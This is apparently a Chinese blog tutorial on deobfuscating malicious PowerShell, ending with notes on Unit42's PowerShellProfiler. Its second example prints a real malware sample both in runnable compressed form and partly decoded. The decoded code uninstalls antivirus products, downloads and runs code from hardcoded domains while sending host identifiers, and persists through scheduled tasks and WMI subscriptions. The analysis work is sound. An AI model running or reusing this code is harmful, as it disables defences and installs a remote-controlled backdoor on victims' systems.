混淆还原helloword

一切混淆的最终结果都是无论它怎样混淆,最终都会执行它原本的代码

  1. powershell  -NonInt  -NoProfi    "&( $EnV:ComSPEC[4,26,25]-JOiN'') (( '4!33x58&39}54@126q27_60M32b39}115!116o27@54@63}63&60@115o24!107!52M54o52b54o114@116q115&126}21_60}33M54b52}33q60!38}61b55&16&60b63q60&33}115@20M33&54_54x61o104_115!94b89M4&33b58b39_54b126b27!60q32@39o115x116q21x38!48x56x115_42_60@38q114@116!115o126}21x60&33x54}52b33@60o38&61x55M16}60_63x60o33&115o20!33M54@54M61!104'.sPliT( 'M&!bo_@}xq' )| %{ [cHaR]($_-BXoR'0x53') } )-join'' ) "

可以看到上面的是被混淆的一段代码
我们知道该类混淆通常就是调用IEX命令来将字符串作为命令执行,当去掉IEX后,执行后就会显示原本的字符串,IEX不一定在开头,也可能在结尾。甚至有时候都找不到IEX这个字符串,那么此时该怎么办呢?

观察上面的代码我们的确是找不到IEX这个字符串,但是我们同样知道“&”是PowerShell的操作符,调用&可以将字符串或变量当作命令执行。

所以我们发现$EnV:ComSPEC[4,26,25]-JOiN’’就是iex
image.png
那么就变成了如下这样

  1. powershell  -NonInt  -NoProfi    "iex(( '4!33x58&39}54@126q27_60M32b39}115!116o27@54@63}63&60@115o24!107!52M54o52b54o114@116q115&126}21_60}33M54b52}33q60!38}61b55&16&60b63q60&33}115@20M33&54_54x61o104_115!94b89M4&33b58b39_54b126b27!60q32@39o115x116q21x38!48x56x115_42_60@38q114@116!115o126}21x60&33x54}52b33@60o38&61x55M16}60_63x60o33&115o20!33M54@54M61!104'.sPliT( 'M&!bo_@}xq' )| %{ [cHaR]($_-BXoR'0x53') } )-join'' ) "

之后我们只需将代码再去掉一部分,如下图所示 就是把iex去掉

  1. (('4!33x58&39}54@126q27_60M32b39}115!116o27@54@63}63&60@115o24!107!52M54o52b54o114@116q115&126}21_60}33M54b52}33q60!38}61b55&16&60b63q60&33}115@20M33&54_54x61o104_115!94b89M4&33b58b39_54b126b27!60q32@39o115x116q21x38!48x56x115_42_60@38q114@116!115o126}21x60&33x54}52b33@60o38&61x55M16}60_63x60o33&115o20!33M54@54M61!104'.sPliT( 'M&!bo_@}xq' )| %{ [cHaR]($_-BXoR'0x53') } )-join'')

image.png
可以看到,真正的代码就显示出来了,是不是非常简单?

值得注意的

使用的过程中,不光存在IEX,还存在Invoke-Expression、Invoke-Command、ICM、.invoke()、设置别名Set-Alias 等方法来调用,因此只要仔细观察,应该都能还原成功。

第二个还原案例demo

  1. I`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('edbd07601c499625262f6dca7b7f4af54ad7e074a10880601324d8904010ecc188cde692ec1d69472329ab2a81ca6556655d661640cced9dbcf7de7befbdf7de7befbdf7ba3b9d4e27f7dfff3f5c6664016cf6ce4adac99e2180aac81f3f7e7c1f3f227eb7bd7999a69fa51fddf9f8ddc79f7c7fffdef7f2c597df7efdf277fbe4fbbb7bdfcbbff872fe7af5bba55bbf30fd993b9fdefbfeabecdb27df1b7dfce264fe719a9e9e64e52a7fb59da60fed375f9db7fe37773efe8d93df38f9f8938fefa477f64da33b0f7777e5d74f761ee017fa9e7e7ff8f0fbafe8377cbe45009eaf72faebd53660ebc7a33bf7ed9b0fe9b307fafb03f3e9564a9fe6e8fcf4d5743bdddfdb75ef12663ff1d36fe85f81fd6adb0e873efbceec84feb56fd23be91ea193d12fdae2cdab87f46f6a5e4ed34f1feaeb77f6a895c5ebc0feb6b783cf0d62a9057e87e03cbb9b664dfb2a5db677d3bccdcb7c76376dde36593b9f36a0187dbfeb35a0373e017e9d76049f9bee69536d160789ff7e09fec9a775f5ecf7f83d7e8f74370585d765f693dbe9d3575f7ef72926ef938f0122cd57d76fb6d36555344d5eaf16d5495e4eb2a6789a5e3d9b36d4a8ced1345f6475f6924853e79775fe7a992d96d973fab3c9a7053ea05fdbfc7559d5edb23a6997795daf4fe8b32f4edfbcfe7df0e5a32f9eff5edf2688e9bccd5e6ea7d76d9dafaafae5226fcfb6e9c5941e60fc765a9593cf0819f439cdd2fbf7763f6beb6a556653faa02ad3157ee2cbcfca6a5ab555bd4a97c56775314bafe8c3674a17bc4caf5e2ff319f5f91921bffc8a3e932fd3bc5cd7e96c96a565995de575716e7fb9a40fe74d9b2ffbf80099fd7d834c556a4f84501c9b67d3fbfbf4c5fef512d42334f405c14671a0af3a6868ab3836f7ee73ffed345f2eab69ba3be6ff3ec3c4d170e463d34dfa70effefd4fb9fd326f9ba24cf72fab76ff92077efd8e50a5afb4f1ca0c269f66e7fa3b4dfbb248f377f9384061f6fac5d3d7021b1248a34f2f96c59226133d8554752f4feff21f18ee622aa0b41be25488606afe411ff7d3559e970d64b3adb3b649f561bebef34b30d18e7f9f4d0964b1a0bfae48b40186d401cdfbac98a757db844c3e172ebe22f4a677991d5a924fbc91bfc997c5f3193133b1fd217d0524091cf1ebde3d62cde6ba018b5f55b3657105269ee275703064a45d53fbd34348d602eae3453e8776f9e4ea19d86faa8cf7e217ff9e694302b1585fd4c7dbe00b70d3aaa8a7cd640df0ad9985aa867ce46602b35583d75943d52c81eb4664ebf2d4a22da4e0b74fd2a6c9ca936d9ac425116d79562cbe0bd1dafaacced18edf3ebc4313f53a054f82a7e55dd0f9b8aeeafa743bfd252043f3e59a47fffaf77ffda5e38797bfbffe9ab5d9d3196b85365b908639c7777bf796c577e9c5f4f8f519a1a04d8109b55b9eb5f9459d4127ebb4a5a7af4ebffddd7467e7d37be98bb36fbf39fb6eca235b0a3a3ca2c2a8b96c5a9c17b3ea0b33b2dffff74fbff8f2d5b3f45be99b93d3e7a7af85e29f5dd7f9fa2780fff39ff82e53ff225b5f909ab29fef5d2e0a9a5c854a9407c9f95562fcd56b909b9138c46f7636a7e7fe54023b3b9be03a9d50fad59f539d4c03763b25792a8b672d6b83cb531ac1f06ca161c8358a718f79ecf4032bf46a260b9da327cb45e9c5b2202e7e522b1b556fa49f414444e4582c217777686a57cd4f8fb38c7e19993fe8e716f5411e403dbe73e7fe16a982ba056af4de784de41b2942d470efab4eeb11aca6bc42bfe02d79859aed066d9bd50253f1190b3aa4dc28848f455f2c33108238ec33376f167941df687ffef18bef34e88854758a9f5bf36996d7956174f38a080aa4242a1bda9a4504fcaf42312c11425d91038ffb81642000d423f81dfcb489e5e9fb673196a7cf235c6f948ae3cd2ecbd347a4b8276f89e613fa9dc0f8da4bdfef2a31c36ec28ef48e016ffa8b49c026f637c4ffc57776dba29aa9466fabe5f6d679a10ee62ff9c5f32991883d1c99108b38fdeeec3ce30f41e08ecfb753fa76a9887555705563a22cb2da6a006732b43f3df9f2ec0b60fcf967065146fbba6e3dff0bc8fe985a34a3fa183d366f64dbc0b646427eecc7f41550172c4c889df32f1803bcc3e5ba768e9e34df1553c93018f2365b4cf9f297c80fede097fc987eaae4fb31f3f78fd18be68fb25c2fb7db7545fef31dfcfe1dbc2c5a860466b4938ef853fcaebf607e46fbe9e80ee49ffeb02ac00a7357f09dc62215e0544620fcf46d4ffe474487a75f9cfcfeaf5fd22ff6cb72f17b8f4112c6097367fedaa29f50724d7191bf1ad7f9acaccebf038febe4c7f8c1707fec17dfb9a350e90b010c5db42c32f263d176dce5feb13883e8e0bcb08030f1f6f7f44e633c58695e18b62bcef3a7165b523f0c4bbf6390a9ea2203ea0e0121755378efe0577d459497795fde6365ad1fed6e815bde1097daf19f7ce681d3d63071c468fa12331e08c1af3cc3cb9775d33678d74209b8cff0dcc750c7fc8f729e9db0884fc60e194b2771364536835cbff3695a2deea6a76fbe7a71f605b86ddadc5583081e82fb85b14f7dd1d079c89b324f7fd6706144c44b4c2199b943c3494d80d09d0c5464be51bb45e68022f2a59b8c5ff24be853f5810081851aa64d10f9c518d22fb9236f6e7d42d2621dd4efaafe3daf5e57b543605a7c41adf03a5eb718fce23b7be92fcaad6771ef772ff0397a53e47e89f4615fdce5e6d4ce91de1fcb2f69be5450105dee917ed17777ccbbfe1b7744dee95f7d91befaf25d3e5b9e3d7af4fdebacaeb3ef1169f08aa15ed46aab0ed3297626ec63d84733a1f663f00f4fe4de2ecda476ec4da8fdc49b4c4fdd5a96ea74476027e249f67ae4ee14acf4ba917f00e32e3c974ec78e75e44f353abe69f4ed22f40623e4318267debd4fb78c86801a08259f5af8c2df16f441cfd4ddd992b8f3441a52136ee0cc30d2109c221853cc3bcbe7d3d76a4029e632b674fb2a7f41936dbaf2a243f89d0b68e2e9f8ddf27a918de14a8ef8c3e9f882b2113f709fe84b95d188e39dfade0fe4fbaddff333e61ea6d39d3b9ffeeeac58496cb25730e25b9f7cba45eed71a18b94f7fe2a7a9d19b3b7b7bbbe3f183879fec3c1c8f15f2fd4f3f79707f3c3ed8dffafef7bf5767f3e9f7b69645f5d3a458ea759bd7bfd828e02d1571d2f31098e9727d6e346e5db51919be62592c60948e79c2a6e9f7f3b27a456ea202288bf513116f9e2e560bf4f1770d226526b13b53bb98922d7d39be6e8b7aaddfc38fcb5f7f6f0b509767cd1999df2dcdced00021686d417fcfce6c27df1d134c1fd294deffbefd4c758dd788deb936e86af3adcf3299c6df3821dadfc11cd2ffa8e1b7e437a6d59d3b4ce97a6bf4f4ecabafc677da295acc242944b12799ee35d25126ea64775af8a5a230601b0a7074fac5f18b57a7afbf7a74b9cca14ee4ef375f31b5f8b5975f7c79a2df6efd9eac31e97fbf07fdff136d7049dfe0630e68eecaf79f9435eb98ec50fe6617069fcb8f5df3a78290bfeede7db46adb39ffa15fac3f1340bfe497fc923b13fa69b805aa1134d87a97af2ecfcf7eb136271feacef7f5f7dd07c4753bdf9b7d0744b12f82cdb401bdcdbed3ebfd4ff3267bb2a8ea67349f14a75f526e083d98d8eb0e8973714974851cea67b5fecc5f57edeaba8617b77bfcedd7e3ebf92aab2fe4333bfd42746ac272ba35c248602a10f25c73a0429d8e0d4851538746045632802d32b2ad2411912882f49d8d6b6a7bc8d8696345b236681dbf7ed54789de7558314a9f31a0dd9d773b18f3c79261d8c19ff8ec336270ebf7afde9d8e57680da674d3f7d9ce6ef6edd9f32f7fd1f9aa7ef0ead3dfe72c3fdffde95d827439fd89af56cff7eefea09cfcf4eae4f9d39f9edc3ff862e7e4feef53ae7fd177df2e4fbeca5f3c9fef9fe7bfa8d87ff58377cb7bd3e3d73f7530bd7afb6aa7deb9470ee3f3c9faf9ea60f7e079317dfadd9d57bfcfdd370b2491eb7bbfd78345f9eddfe76c5ab43f78f30333febd172fee7d71f5f0ec634d650a1bbffce9fdb7f577cff1dea73fd97e7bb27eb15cbc7971efeee5c1e50574c762f57bd3bf4f763fbfa41fbff7fac16ef5ddc51eb3214865b984b9c412da328bf9847986b42429e9ea8bb18d57ce3dc7f0d04d22cd8c7ebc8967303bdaecc5674cf6ef4fe9dff1f8de83ddefc1927c3611f6f8c577e893b4bdd84ea7e2a38385a090a7636e36956687f42ffb0d5ba42b39e2ceaa7279553da53f49832cf3a224793a99e4df1db7645108077a813e0126f4db15fd4a0cfc1940fe628193890f4e8a195ca09106eb68fa7b36fbe28b6b7a7e7ffa3d95c89ed37164a99f8ad9a07ea13fe8c3df0331f5a5becc0e311b7343dd25b912f9bb6a72d12c38cfbe5a376ce609e7b2682856bf64b713d452b2532a726767874291257cbcbcceaecaec8b6dd2d6c79c766faf27fa19fdb9fb4b3103f54bce083d7cc4fe2ab91194300136f9252216247421ab40855c819621e3b72967fabf5cffee76ee9648e6bef8dd31eafc6d511af705896b40ceeb7c7e45c42546a1843772a6c8cba493bba9a46b633d53b7d4b9f64cbf312a9dfe9b755dfc2406e87aee74492fbd6faf66b0d21f662f36e4a11e3143efdfa3d20b6ea14768fd943bc740d0ffea32eb75edaf541012e05b436c05f13eb8b8a9f6c7dd3666a5c1438059fbc3e638d29f19eaef7efd5612f110c906a98fdfeb7747d7764c3d0ce8af9b90c00bd00c40e563449e061b16ad028e63809399199f1479733ac870a66b7d2f4a06ea6331a52fb7b6d2ad14668ffeb73cabbeb32d13f90eef7effde68f77b77b63e7f51bc2273f3667c3a7d91bf3a7d76fa6a9537d5a43efd495a674db7c61f6f6d7d941ea6bf702bfddd4e5ffce4a3932fbf685e9e4ebfb73fdabd3fdabbfffdedef5467cb8f698595ba4a3f3f7db3fd93d9abb3ec49799aee7d9b9676b72f8fcbaf4ebf5cdef9de36ad0d8db76f6a367e7efae2f337f3f44eca905f7cfc31fdfa1b27ff0f'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

.\123.ps1 >>1234.txt
第一次处理的结果如下
image.png
将上面的进行字符串翻转,可以得出下面的代码

  1.  ) ''NIoJ-] ) hTGNEL.)nOEUlAv-  lH2 ElBaIRaV-TEG  (( -..1 -[)nOEUlAv-  lH2 ElBaIRaV-TEG  (( )''nIoJ-]52,51,4[cEPsMOC:VNE$ (& ; "(('.( hCNVErbosepREFEReNcE.TOstRiNG()[1,3]+tfUxtf'+'U-JoIntfUtfU) ( ((tfUcm'+'d /c start /b wmic.extfU+tfUe product where cFwname like uOs%Eset%uOscFw calltfU+tfU uninstall /n'+'oint'+'eractive
  2. '+'
  3. cmd'+' '+'/c start /b wmic.exe product whe'+'re cFwname '+'like tfU+tfUuOs%%K'+'asp'+'er'+'sky%%uOsc'+'Fw call uninstall /nointeractive
  5. cmd /c start /b wmic.exe product where cFwname '+'like uOs%avtfU+tfUast%uOscFw call uninstall /nointeractive
  7. cmd /c start /b wmic.exe tfU+tfUproduct w'+'here tfU+tf'+'UcFwname like uOs%avp%uOsc'+'Fw catfU+tfUll uninstal'+'ltfU+tfU /nointeractive
  9. cmd /c start /b wmic.exe product'+' where cFwname like uOs%Security%uOscFw call '+'uni'+'nstall /nointeractive
  11. cmd /c start /b wmic.exe produc'+'t where cFwname like uOs%AntiVirus%uOscFw call uni'+'n'+'stall /'+'nointeractive
  13. cmd /c start /b wmic.exe product where cFwnametfU+tfU like uOs%Norton Security%uOscFw call uninstall /noi'+'nteractive
  15. cmd /c cFwC:9'+'RTProgra~19RTMalwarebytes9RTAnti-Malware9RTunins000.extfU+'+'tfUecFw /verysilent'+' /suppressmsgboxes /notfU+tfU'+'restart
  17. CdJv=cFw?'+'CdJvcFw+(Get-Date '+'-Format uOs_yyyyMMdduOs)
  19. CdJtmps=uOsfunction a(CdJu){CdJd=(Nefvpw'+'-Objfvp'+'ect Net.WebCfvplient).cFwDownloadDatacFw(CdJu)'+';Cd'+'Jc=CdJd.count;if(C'+'dJc -gt 173){Cd'+'Jb=CdJd[173..CdJc];CdJp=NtfU+tfUew-Object Security.Cryptography.tfU+tfURSAParameters;CdtfU+tfUJtfU+'+'tfUp.Modulus='+'[cotfU+tfUnvert]::FrotfU+tfUmBase64String(u'+'OsuOs2mWo17uX'+'vG1B'+'Xpm'+'dgv8v/3NTmnNubHtV6'+'2fWrk4jPtfU'+'+tfUF'+'I9wM3NN2tfU+tfUvzTzticIYHlm7K3r'+'2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv'+'1j1feIY6R7rpfqOLdHa10=uOstfU+tfUuOs);CdJp.ExpotfU+tfUnent=0x01,0x00tfU+'+'tfU,0x01;CdJr=New-Object Secu'+'rity.Cryptography.RSACryptoServiceProtfU+tfUvider;CdJr.Im'+'portParameters(Cd'+'JptfU+tfU);if(CdJtfU+tfUr.veri'+'fyData'+'(CdJb,(New-O'+'bject Security.Cryptography.SHA1'+'CryptoSetfU+tfUrtfU+tfUviceProvider)tfU+tfU,'+'[convert]::FromBase64String(-jtfU+tfUoin([char[]]Cd'+'Jd[0..171tfU+tfU]))))tfU+tfU{Ifvpex(-join'+'[char[]]CdJb)}}}CdJurl=utfU+tfUOsuOshttp://uOsuOstfU+tfU+uOsuOsU1uOsuOs+uOsuOsU2uOsuOs;a(CdJurl+uOsuOs/a.jspuOs+CdJvtfU+tfU+uOs?uOsuOs+(@(CdJenv:COMPtfU+tfU'+'UTERNAME,CdJenv:USERNAME,(get-wmiobject Win32tfU+tfU_ComputerSystemProd'+'uct).UUID,(random))-joinuOsuOs*'+'uOsuOs))uOs
  21. CdJsa=([SecuritfU+tfUty'+'.Principal.WindowsPrincipal][Security.Principal.W'+'indowsIdentity]::GetCurrent()).IsInRole([Se'+'ctfU+tfUurity.Princitf'+'U+tfUpaltfU+tfU.WtfU+t'+'fU'+'indowsBuiltfU+tfUtInRole] cFw'+'A'+'dministratorcFw)
  23. funct'+'ion getRan(tfU+tfU){return -join([char[]](48..57+65tfU+tfU..90+97..122)T'+'jQGet-Random -Count (6+(Get-Random'+')%6))}
  25. CdJus=@(uOst.zz3r0.tfU+tfUcotfU+tfUmuOs,uOst.zer9g.comuOs,uOst.amynx.c'+'omuOs)
  26. tfU+tfU
  27. CdJstsrv = New-Object -ComObject Schedule.Service
  28. tfU+tf'+'U
  29. CdJ'+'stsrv.Connect()
  31. try{
  33. CdJdo'+'it=CdJstsrv.Ge'+'tFolder(cFw9RTcFw).GetTask(ctfU'+'+tfUFwblackballctfU'+'+tfU'+'Fw'+')
  35. }catch{}
  37. if(-not CdJdoit){
  39.     if(CdJsa){
  41.         schtasks'+' /c'+'reate /ru system /sc MINUTE /mo 120tfU+tfU /tn blackball /F /tr c'+'Fwb'+'lackballcFw
  43.     } else {
  45.         schtasks /create /tfU+tfUsc MINUTE /tfU+tfUmo 120 /tn '+'blackball /F /tr cF'+'wblackballcFw
  47.     }
  49.     foreach(CdJu in CdJus){
  51.         CdJi = [array]::IndexOf(CtfU+tfUdJus,CdJu)
  53.         if(CdJi%3 -eq 0){CdJtn'+'f=uOsu'+'tfU+tfUOs}
  55.         if(CdJt'+'fU+tfUi%3 -eq 1){CdJtnf=getRan}
  57.         if'+'(CdJi%3tfU+tfU -eq 2){if(CdJsa){CdJtnf=uOsMictfU'+'+tfUroSoft9R'+'TWindows9RTuOs+(getRan)}else{CdJtnf=gettf'+'U'+'+t'+'fURan}}
  59.         CdJtn = getRan
  61.         if(CdJsa){
  63.             schtatfU'+'+tfUsks /create /ru system /sc MINUTE /mo 60 /tn cFwCdJtnf9RTCdJtncFw /F /tr cFwpowershell -w hidden -c PS_CMDcFw
  65.         } else {
  67.             schtasks /creat'+'et'+'fU+tfU /sc '+'MINUTE /mo 60 /tn cFwCdJtnf9RTCdJtncFw /F /tr cFwpowershell -w hidden -c PS_CMDcFw
  69.         }
  70. '+'
  71. '+'        start-sleep 1
  73.         CdJfolder=CdJstsrv.GetFolder(cFw9RTCdtfU+tfUJtnfcFw)
  75.         CdJtaskitem=CdJfolder.GetTasks(1tfU+tfU)
  77.         foreatfU+tfUch(CdJtfU+tfUtask in CdJtaskitem'+'){
  79.             foreach (CdJatfU+tfUction in CdJtask.DefitfU+tfUnition.Ac'+'tions) {
  81.                 try{
  83.                     if(CdJaction.ArgumtfU+tfUents.C'+'ontains'+'(cFwPS'+'_CMDcFw)){    
  85.                         C'+'dJfolder.RegisterTask(CdJtask.Name, CdJtask.Xml.replace(cFwPS_CMDcFw,CdJtmps.replace(u'+'OsU1uOs,CdJu.substring(0,5t'+'fU+tfU)).replace(uOsU2uOs,CdJu.substring'+'(5))), 4, '+'CdJnull, CdJnull, 0, CdtfU'+'+tfUJnull)TjQout-null
  87.                 '+'    }
  89.                 }catch{}
  91.             }tfU+tfU
  93.         }
  95.         start-tf'+'U+tfUsleep 1
  97.         schtasks /run /tn cFwCdJtnf9RTCdJtncFw'+'
  99.         stfU+tfUt'+'art-sleetf'+'U+'+'tfUp 5
  101.     }'+'
  103. }
  106. try{
  108. CdJdoit1=Get-WMIObject -Class __EventFilter -tfU+tfUNameSpace uOsroot9RTsubscriptiotfU+tfUnuOs -filter cFwName=tfU+tf'+'UuOsblackballuOscFw
  110. }catch{}'+'
  112. if(-not '+'CdJdoit1){
  114.     Set-WmiInstance -Class __EventFilter -NameSpace ctfU+tfUFwroot9R'+'TsubscrtfU+tfUiptioncFw -ArgumtfU+tfUents @{Name='+'cFwblackballcFw;EventNameSpace=cFwroot9RTctfU+tfUimv2cFw;QueryLangua'+'ge=cFwWQLcFw;Query=cF'+'wSELECT * FROM __InstanceModi'+'ficationEvent WITHIN '+'3600 WHERE TargetInstance ISA uOsWin32_PerfFormattedData_PerfOS_StfU+tfUystemuOscFw;} -ErrorAction Stop
  116.     tfU+tfUforeach(CdJu in CdJus){tf'+'U+tf'+'U
  118.     '+'    CdJtheName=get'+'Ran
  120. '+'        CdJwmicmd=CdJtmps.replace(uOsU1uOs,CdJu.subs'+'tring('+'0,5)).replace(uOsU2uOstfU+tfU,CdJu.'+'substring(5)).replace(uOsa.jspuOs,uOsaa.jspuOs)
  122.   '+'      Set-WmiInstance -Class __FilterToConsumerBinding -Namespace'+' cFwrtfU+tfUoot9t'+'fU+tfU'+'RTsubscriptioncFwtfU+tfU -Arguments @{Filter=(Set-WmiInstance -Class __Eve'+'ntFilter -NameSpace cFwroot9RTsubscri'+'ptioncFw'+' -Argument'+'s @{Name=cFwfcFw+CdJtheName;EventNameSpace=c'+'Fwroot9tfU+tfURTcimv2cFw;QueryLanguage=cFwWQLcFw;Query=c'+'FwSELECT * FROM __InstanceModificatfU+tfUtiotfU+t'+'fUnEvent WITHIN 3600 WHERE tfU+'+'tfUTargetIn'+'stantfU+tfUce ISA uOsWin32_PerfFormat'+'tedDatatfU+tfU_PertfU+tfUfOS_SystemuOscFw;} -ErrorAt'+'fU+tfUctio'+'n Stop);Consu'+'mer=(Set-WmiInstance -Class CotfU+tfU'+'mmandLineEventConsume'+'r '+'-NamespactfU+tfUe cFwrotfU+tfUot9RTsubscriptioncFw -Arguments @{Name=cFwcc'+'Fw+CdJtheN'+'am'+'e;ExecutablePath=cFwc:9RTwindows9RTsystem329RTcmd.execFw;CommandLineTe'+'mplate=cFw/c power'+'shell -w hidden -c '+'CdJw'+'micmdcFtfU+'+'tfU'+'w})}
  124.         start'+'-sleep 5
  126. '+'  '+'  '+'}
  127. tfU+tfU
  128.     cmd'+'.exe /c netsh.exe firewall add portopening tcp'+' 65529 SDNSd
  130.     netsh.exe intertfU+tfUface tfU+tfUptfU+tfUortproxy add v4tov4 listenport=65529 ctfU+tfUonnectaddress=1.1.1.1 connectport=53
  132.     netsh advfirewtfU+tfUall firewall ad'+'d rule name=ctfU+tfUFwde'+'ny4'+'45cFw dir=in protocol='+'tcp tfU+tfUlocalport=445 action=block
  134.     netsh advfirewall firewall add rule tfU+tf'+'Uname=cFwdeny135c'+'tfU+tfUF'+'w dir=in protocol='+'t'+'cp lo'+'calport=135 ac'+'tion=block
  136.     Set-ItemProperty -Path cFwHKLM:9RTSYSTEM9RTCurrentControlSet9RTServices9RTLanmanServer9RTParame'+'ter'+'scFw DisableCompression -Type tfU+'+'tfUDWORD -Valu'+'e 1 ???Force
  138. }
  142. schtasks /delete /tfU+tfUtn Rtsa2 /F
  143. '+'
  144. schtasks /deletfU+tfUte /tn Rtsa1 /F
  146. schtasks /delete /tn Rtsa /FtfU)-cREplaCe  ([CHaR]1'+'02+[CHaR]118+[CHaR]11'+'2),[CHaR]96  -RepLaCE tfU9RTtfU,[CH'+'aR]92 '+'-cREplaCetfUCdJtfU,[CHaR]36-RepLaCEtfUTjQtfU,[CHa'+'R]124 -cREplaCe'+' ([CHaR]117+[CHaR]7'+'9+[CHaR]115),[CHa'+'R]39-R'+'epLaCE([CHa'+'R]99+[C'+'HaR]70+[CHaR]119),[CHaR]34) )'+'
  148. ') -ReplaCE  'tfU',[CHaR]39  -ReplaCE  'hCN',[CHaR]36)| &( $pShOMe[21]+$PSHOme[34]+'x')" =  lh2$

下载PowerShell-Beautifier.psd1进行代码格式化
Import-Module ./PowerShell-Beautifier.psd1
Set-PSRepository -Name PSGallery -InstallationPolicy Trusted
Install-Module -Name PowerShell-Beautifier
Get-Help Edit-DTWBeautifyScript 下载成功

Edit-DTWBeautifyScript C:\Users\Administrator\Desktop\1234.ps1 -IndentType Tabs
发现有点问题哈哈,下次再试试~

这里处理混淆后的操作就比较麻烦了,像我比较笨,就只想到了可以手动替换某些字符串为空即可还原为原本的字符,例如

  1. cmd /c start /b wmic.exe product where cFwname '+'like uOs%avtfU+tfUast%uOscFw call uninstall /nointeractive
  3. 替换为cFw" 
  4. 替换 '+'为空  
  5. 替换tfU+tfU为空
  6. 替换uOs'
  8. cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive

可以全局寻找repace来寻找一些灵感。

powershellprofiler

https://github.com/pan-unit42/public_tools/tree/master/powershellprofiler
powershellprofiler是Unit42安全团队在Github上公开了自己研发的powershell自动反混淆工具

  1. python3 PowerShellProfiler.py  -f 1.txt  -d

代码逻辑如下从main方法开始
1、替换空字符
2、进入unravelContent函数处理返回的内容为赋值给ALTERED SCRIPT
3、unravelContent函数的主要操作有
1)翻转部分字符串,进入reverseStrings方法
2)反编码如frombase64string等,并解压字符串进入decompressContent方法
3)base64解编码,进入decodeBase64方法
4)进入decryptStrings函数进行解密操作如AES之类的
5)进入normalize函数进行处理
4、normalize函数是代码的核心,主要是进行反混淆字符串。
1.删除一些无用的运算符:”空格”、”^”、”`”。
2.转化Char字节为ASCII码。
3.去掉”+”,连接字符串。
4.replace字符串。
5、返回contentData为结果

官方给出的demo代码

  1. Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i0nG6lf5ur7+dl8/PZt/b/f4nv1szP6Xfn35v9973P/n43cd30i16PvrFu7v3f8kv3r2Pf/Z3fskvfrD3S37xw3v0f/r94f4v+cV7e7u/5Bff+/SX/OJPD6jFPfpjd4d++5TaP6DfP8U/B/TO7sOH1Pge3tihz/YA6/49fP5LfvEBt6QPdh/QJ/uf4hf6B3/sPgDY3V10RK3uASzB2N07ADTujYDfA9SHaI3v+Ld9anCAXx6i0aeASa3uoZMdNAL+nwKbXbwPAOjkPmOKv/DRLqOyB0zxygP65R5AHqAlAAHaQ/y2h/d4ODv3gQtDoN/uowV6uYdh7KHBfQz2PkHYx4u76EHwBNVAmd0dtMdgedT4i34B+fYxlPvUbp8BgXJMC8aAAN0jLD7lrzA4TBSoRH8DJSAPmgDeDnrdxzef8sCYdECXUQK++IUaPQRCjPYOA0FrzNjupxgAUAI49IK3DvDWAbUGpUDyvV0mBHW0jzfR/94eXr9PXwJ/DGZ3lxFhgtInmHh8+pCnDExDnx7gUxDuHjfDb4QANcP3IAu45yHggKrgFDAQ5mmXX8Oo9/EpRrHLrzMDASKDRWv0ClbEDIEazPj48FNGEL9hGJ9Sn58yHHTFHAW23sXnQPoB44RX9pi4/DJzEw8GZAbCGCK+4unew/+ZT0A1ZjJGm7kDHTOHYg52mbcw27sY5h5e5e73uQVmmKWKR8UE4ZeoPfrh+WNc8D2+ZvzRGeaFaQFu22XRhmjtgvXR3R5TjPkVVKRPMUaI2R4YYJcnH0Ag7Sx0YE6WDkjVHthmj/jqo3T7/OOf/nj0cd5uf3dRfDn56Xzapt8tlvTR5/T/ve/QP+mU/pn/4l9C/7Z1Qf826Um1vMzrFl/u/vSzX0g/X77+jH6jXz7Bh/jn2fFX179xQr/8xsmP0b8LvKjf//SzeduuHt29i7bb+OeL45OLU3wtPW6f0L/Xu8DsLnonWPTvus5T4Gph4q8K37/whkC/ji/x92L8Zl7n2Yx+X+ZXvwf9yBZ5+hn95J7yhvuj/99hNIslRsCoF8t7e7//lytgjbdr+v/vP60A4BJfg0r66jh/R//+wlm1yOjnFBA+4SHMqqtlWWUz9PHFuuVmgJOffx89jr98fVxP5x8LAfFjO1+lk2t0eWf8lH60GCYGiM8I6scy8NfXgLh9XtRNm+5enKIlN8B3eckvMbGA4XcW1XLV8JCL5cX3976zYDRX2XLG7fh3wCvO6Z/LR3gPkwkov/+X9M8WvUI/Gp5p+v8Fdc+Ife5Re5GDXRp8vH2V8piYBC1e1eERnPMyu2BCT9PP0q0LNM+mKVhg1VAjmtFfkpf01++dbr3QF38h0Nqi/5dZ06Tf/RjzDqrzPKWA+TE47/T3Pj1hZgNPjDHw/GpbeJl+BxOlu/TPFyDW22KV7mIo+D8Tima/ra9/Mb0tg6WpBJNf35FeuE3RCqzvSecY6UvMJjM8A1/ko+/hE4BdvM2vmej4AuwNsHfo/xjsV9efl9UkK38AsDyiH3vdZixL01axTrdfKxj6sSz4LWbM16evXmDWynR7Wa14GKvqKq+bOZNusSJOYyw+wXet/Er/1FlLDKAY8Sdm0PQrWEJkDTjn7fi7+eSkLPIlcKqbolp+grmYFO1neB0MzkyRs0rg0RfovdH/sz4B3Jb1CPMk02zKbTG5r3lgwLHJGYdnpg2m/QwTpRxDv4GjlC4fM5EgifgiBxpELBYuNL4jA4I2+Vi5Vpjil0yzFnxRV3jlp4HRHoQDjbeP64s18XD7nP5ajXOWh9mMmbpFV78Q2oTnlfoA3hdgyRSy0dbrj2WKwfDrJq9VC7IA5Ew8Jtr2CcDew9voHE1YbRLSgHxnjL5Zgr6dow9VRNqj6KQLNGJJvAJLAAmeNVXD9O9LNP6NEx4tKWwmhkrBsy/Tk9c/CarV6Ib63cNsP1Nm+Bh8D+w+lrlrMEHPmNUwX6QP8cWIhowWl0wNdIZftj7nv6bMJdmlYfwZ4DD4q4/v3NmuT18+z07ydOt7028fv/r+/Z1P5JcH+/oLuYp3RvLrvU9tc9OeTK22+/SheWH3vnmBrLt5w7Tf27NwD0xXB6b9w